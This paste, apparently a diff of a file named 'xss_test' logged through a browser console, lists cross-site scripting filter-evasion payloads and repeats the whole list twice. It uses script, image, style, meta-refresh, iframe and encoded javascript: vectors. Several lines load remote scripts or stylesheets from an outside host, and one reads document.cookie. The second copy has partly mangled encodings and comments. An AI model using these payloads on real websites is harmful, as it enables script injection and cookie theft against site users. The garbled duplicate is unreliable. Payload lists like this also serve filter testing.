tourist · July 21, 2015 09:45
diff --git a/xss_test b/xss_test
 ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
 alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
 ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

 VM239:3 '';!--"<XSS>=&{()}

 VM239:3 <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

 VM239:3 <IMG SRC="javascript:alert('XSS');">

 VM239:3 <IMG SRC=javascript:alert('XSS')>

 VM239:3 <IMG SRC=JaVaScRiPt:alert('XSS')>

 VM239:3 <IMG SRC=javascript:alert("XSS")>

 VM239:3 <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

 VM239:3 <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

 VM239:3 <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

 VM239:3 <IMG SRC=# onmouseover="alert('xxs')">

 VM239:3 <IMG SRC= onmouseover="alert('xxs')">

 VM239:3 <IMG onmouseover="alert('xxs')">

 VM239:3 <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

 VM239:3 <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
 &#39;&#88;&#83;&#83;&#39;&#41;>

 VM239:3 <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
 #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

 VM239:3 <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

 VM239:3 <IMG SRC="jav	ascript:alert('XSS');">

 VM239:3 <IMG SRC="jav&#x09;ascript:alert('XSS');">

 VM239:3 <IMG SRC="jav&#x0A;ascript:alert('XSS');">

 VM239:3 <IMG SRC="jav&#x0D;ascript:alert('XSS');">

 VM239:3 perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

 VM239:3 <IMG SRC=" &#14;  javascript:alert('XSS');">

 VM239:3 <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 VM239:3 <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

 VM239:3 <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 VM239:3 <<SCRIPT>alert("XSS");//<</SCRIPT>

 VM239:3 <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

 VM239:3 <SCRIPT SRC=//ha.ckers.org/.j>

 VM239:3 <IMG SRC="javascript:alert('XSS')"

 VM239:3 <iframe src=http://ha.ckers.org/scriptlet.html <

 VM239:3 \";alert('XSS');//

 VM239:3 </script><script>alert('XSS');</script>

 VM239:3 </TITLE><SCRIPT>alert("XSS");</SCRIPT>

 VM239:3 <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

 VM239:3 <BODY BACKGROUND="javascript:alert('XSS')">

 VM239:3 <IMG DYNSRC="javascript:alert('XSS')">

 VM239:3 <IMG LOWSRC="javascript:alert('XSS')">

 VM239:3 <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

 VM239:3 <IMG SRC='vbscript:msgbox("XSS")'>

 VM239:3 <IMG SRC="livescript:[code]">

 VM239:3 <BODY ONLOAD=alert('XSS')>

 VM239:3 <BGSOUND SRC="javascript:alert('XSS');">

 VM239:3 <BR SIZE="&{alert('XSS')}">

 VM239:3 <LINK REL="stylesheet" HREF="javascript:alert('XSS');">

 VM239:3 <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

 VM239:3 <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

 VM239:3 <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

 VM239:3 <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

 VM239:3 <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

 VM239:3 <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

 VM239:3 exp/*<A STYLE='no\xss:noxss("*//*");
 xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

 VM239:3 <STYLE TYPE="text/javascript">alert('XSS');</STYLE>

 VM239:3 <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

 VM239:3 <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

 VM239:3 <XSS STYLE="xss:expression(alert('XSS'))">

 VM239:3 <XSS STYLE="behavior: url(xss.htc);">

 VM239:3 ¼script¾alert(¢XSS¢)¼/script¾

 VM239:3 <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

 VM239:3 <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

 VM239:3 <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

 VM239:3 <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

 VM239:3 <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

 VM239:3 <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

 VM239:3 <TABLE BACKGROUND="javascript:alert('XSS')">

 VM239:3 <TABLE><TD BACKGROUND="javascript:alert('XSS')">

 VM239:3 <DIV STYLE="background-image: url(javascript:alert('XSS'))">

 VM239:3 <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

 VM239:3 <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

 VM239:3 <DIV STYLE="width: expression(alert('XSS'));">

 VM239:3
	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
	alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
	></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

	VM239:3 '';!--"<XSS>=&{()}

	VM239:3 <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

	VM239:3 <IMG SRC="javascript:alert('XSS');">

	VM239:3 <IMG SRC=javascript:alert('XSS')>

	VM239:3 <IMG SRC=JaVaScRiPt:alert('XSS')>

	VM239:3 <IMG SRC=javascript:alert("XSS")>

	VM239:3 <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

	VM239:3 <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

	VM239:3 <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

	VM239:3 <IMG SRC=# onmouseover="alert('xxs')">

	VM239:3 <IMG SRC= onmouseover="alert('xxs')">

	VM239:3 <IMG onmouseover="alert('xxs')">

	VM239:3 <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

	VM239:3 <IMG SRC=javascript:alert(
	'XSS')>

	VM239:3 <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
	#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

	VM239:3 <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

	VM239:3 <IMG SRC="jav ascript:alert('XSS');">

	VM239:3 <IMG SRC="jav ascript:alert('XSS');">

	VM239:3 <IMG SRC="jav ascript:alert('XSS');">

	VM239:3 <IMG SRC="jav ascript:alert('XSS');">

	VM239:3 perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

	VM239:3 <IMG SRC=" javascript:alert('XSS');">

	VM239:3 <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

	VM239:3 <BODY onload!#$%&()*~+-_.,:;?@[/\|\]^`=alert("XSS")>

	VM239:3 <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

	VM239:3 <<SCRIPT>alert("XSS");//<</SCRIPT>

	VM239:3 <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

	VM239:3 <SCRIPT SRC=//ha.ckers.org/.j>

	VM239:3 <IMG SRC="javascript:alert('XSS')"

	VM239:3 <iframe src=http://ha.ckers.org/scriptlet.html <

	VM239:3 \";alert('XSS');//

	VM239:3 </script><script>alert('XSS');</script>

	VM239:3 </TITLE><SCRIPT>alert("XSS");</SCRIPT>

	VM239:3 <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

	VM239:3 <BODY BACKGROUND="javascript:alert('XSS')">

	VM239:3 <IMG DYNSRC="javascript:alert('XSS')">

	VM239:3 <IMG LOWSRC="javascript:alert('XSS')">

	VM239:3 <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

	VM239:3 <IMG SRC='vbscript:msgbox("XSS")'>

	VM239:3 <IMG SRC="livescript:[code]">

	VM239:3 <BODY ONLOAD=alert('XSS')>

	VM239:3 <BGSOUND SRC="javascript:alert('XSS');">

	VM239:3 <BR SIZE="&{alert('XSS')}">

	VM239:3 <LINK REL="stylesheet" HREF="javascript:alert('XSS');">

	VM239:3 <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

	VM239:3 <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

	VM239:3 <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

	VM239:3 <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

	VM239:3 <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

	VM239:3 <IMG STYLE="xss:expr/XSS/ession(alert('XSS'))">

	VM239:3 exp/<A STYLE='no\xss:noxss("//*");
	xss:ex/XSS////pression(alert("XSS"))'>

	VM239:3 <STYLE TYPE="text/javascript">alert('XSS');</STYLE>

	VM239:3 <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

	VM239:3 <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

	VM239:3 <XSS STYLE="xss:expression(alert('XSS'))">

	VM239:3 <XSS STYLE="behavior: url(xss.htc);">

	VM239:3 ¼script¾alert(¢XSS¢)¼/script¾

	VM239:3 <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

	VM239:3 <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

	VM239:3 <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

	VM239:3 <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

	VM239:3 <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

	VM239:3 <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

	VM239:3 <TABLE BACKGROUND="javascript:alert('XSS')">

	VM239:3 <TABLE><TD BACKGROUND="javascript:alert('XSS')">

	VM239:3 <DIV STYLE="background-image: url(javascript:alert('XSS'))">

	VM239:3 <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

	VM239:3 <DIV STYLE="background-image: url(javascript:alert('XSS'))">

	VM239:3 <DIV STYLE="width: expression(alert('XSS'));">

	VM239:3